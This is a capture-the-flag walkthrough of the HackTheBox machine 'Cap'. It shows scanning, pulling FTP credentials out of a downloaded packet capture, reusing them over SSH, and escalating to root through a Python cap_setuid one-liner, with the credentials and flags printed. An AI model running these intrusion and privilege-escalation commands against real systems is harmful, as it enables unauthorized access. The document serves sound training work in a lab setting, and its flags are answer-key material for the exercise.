# Cap
## Enumeration:
### Port Scanning:
As always we are going to start with scaning the machine to find open ports via `nmap`:
```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.6.226
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 22:47 EST
Nmap scan report for 10.129.6.226
Host is up, received echo-reply ttl 63 (0.20s latency).
Scanned at 2026-01-21 22:47:58 EST for 84s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2vrva1a+HtV5SnbxxtZSs+D8/EXPL2wiqOUG2ngq9zaPlF6cuLX3P2QYvGfh5bcAIVjIqNUmmc1eSHVxtbmNEQjyJdjZOP4i2IfX/RZUA18dWTfEWlNaoVDGBsc8zunvFk3
nkyaynnXmlH7n3BLb1nRNyxtouW+q7VzhA6YK3ziOD6tXT7MMnDU7CfG1PfMqdU297OVP35BODg1gZawthjxMi5i5R1g3nyODudFoWaHu9GZ3D/dSQbMAxsly98L1Wr6YJ6M6xfqDurgOAl9i6TZ4zx93c/h1MO+mKH7EobPR/ZW
rFGLeVFZbB6jYEflCty8W8Dwr7HOdF1gULr+Mj+BcykLlzPoEhD7YqjRBm8SHdicPP1huq+/3tN7Q/IOf68NNJDdeq6QuGKh1CKqloT/+QZzZcJRubxULUg8YLGsYUHd1umySv4cHHEXRl7vcZJst78eBqnYUtN3MweQr4ga1kQP
4YZK5qUQCTPPmrKMa9NPh1sjHSdS8IwiH12V0=
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI=
| 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH
80/tcp open http syn-ack ttl 63 Gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
We have only 3 open ports, ftp on port 21, ssh on port 22, and http on port 80.
Since `nmap` did not indicate that anonymous login is enabled we will overlook it.
### HTTP (80):
Lets start by take a look at the website, and see how it functions:
We are logged in with no reason as nathan. Also this dashboard page is a static one.
Also static pages, with system commands being executed in the underlying operating system, and the result printed out to us, without any parameters we can send to try to manipulate it to get command execution.
Here we have some sort of packets which we can download, and in the url it referes to data id 1, so we can also try others like 0, or 2.
We have something under 0 as well, but nothing further after 1.
I downloaded both files, lets inspect them to find anything useful to us.
### Wireshark:
### 1.pcap:
It has nothing, only html pages intercepted.
### 0.pcap:
Open up the file with `wireshark`:
```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ wireshark 0.pcap
```
Lets find what protocol do we have in this packet from within protocol hirarchy:
Interestingly we have ftp data being captured, and as we all know ftp is not a secure option to use, and we can use other options to mitigate interceptions like `sftp`, etc.
Right-click follow stream on an ftp packet:
### FTP (21):
Lets authenticate to ftp with those credentials:
```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ ftp nathan@10.129.6.226
Connected to 10.129.6.226.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||52048|)
150 Here comes the directory listing.
drwxr-xr-x 3 1001 1001 4096 May 27 2021 .
drwxr-xr-x 3 0 0 4096 May 23 2021 ..
lrwxrwxrwx 1 0 0 9 May 15 2021 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 1001 1001 3771 Feb 25 2020 .bashrc
drwx------ 2 1001 1001 4096 May 23 2021 .cache
-rw-r--r-- 1 1001 1001 807 Feb 25 2020 .profile
lrwxrwxrwx 1 0 0 9 May 27 2021 .viminfo -> /dev/null
-r-------- 1 1001 1001 33 Jan 22 03:46 user.txt
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||46589|)
150 Here comes the directory listing.
drwxr-xr-x 3 1001 1001 4096 May 27 2021 nathan
226 Directory send OK.
ftp> exit
221 Goodbye.
```
We can see it is mirroring the underlying machine, and we can access system files.
Lets try whether those credentials were reused with ssh:
```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ nxc ssh 10.129.6.226 -u nathan -p 'Buck3tH4TF0RM3!'
SSH 10.129.6.226 22 10.129.6.226 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
SSH 10.129.6.226 22 10.129.6.226 [+] nathan:Buck3tH4TF0RM3! Linux - Shell access!
```
Indeed we have access.
### SSH (22):
`SSH` to the server:
```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ ssh nathan@10.129.6.226
The authenticity of host '10.129.6.226 (10.129.6.226)' can't be established.
ED25519 key fingerprint is: SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.6.226' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
nathan@10.129.6.226's password: Buck3tH4TF0RM3!
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Jan 22 03:57:23 UTC 2026
nathan@cap:~$
```
## Post-Exploitation:
Do some local enumeration:
```bash
nathan@cap:~$ ls -la
total 28
drwxr-xr-x 3 nathan nathan 4096 May 27 2021 .
drwxr-xr-x 3 root root 4096 May 23 2021 ..
lrwxrwxrwx 1 root root 9 May 15 2021 .bash_history -> /dev/null
-rw-r--r-- 1 nathan nathan 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 nathan nathan 3771 Feb 25 2020 .bashrc
drwx------ 2 nathan nathan 4096 May 23 2021 .cache
-rw-r--r-- 1 nathan nathan 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 May 27 2021 .viminfo -> /dev/null
-r-------- 1 nathan nathan 33 Jan 22 03:46 user.txt
```
We can not execute commands with `sudo` as nathan:
```bash
nathan@cap:~$ sudo -l
[sudo] password for nathan:
Sorry, user nathan may not run sudo on cap.
```
Lets find out what suid binaries we have:
```bash
nathan@cap:~$ find / -perm -u=s -type f 2>/dev/null | grep -v snap
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/at
/usr/bin/chsh
/usr/bin/su
/usr/bin/fusermount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
```
None could help.
We can notice the name of the machine cap, maybe this is a hint to capabilities:
```bash
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```
Here we have python with file capabilities enabled, that allows python to change its uid, therefor can allow any user to escalate his privileges.
We can search online for python commands, or from gtfobins as always:
{% embed url="" %}
Execute that command:
```bash
nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'
# whoami
root
```
We are root.
Get the flags:
```bash
nathan@cap:~$ cat user.txt
473ad4c57b0f565f262485fa1c26baf0
# cat root.txt
8e9a680ac44815519a99ceb271636d81
```
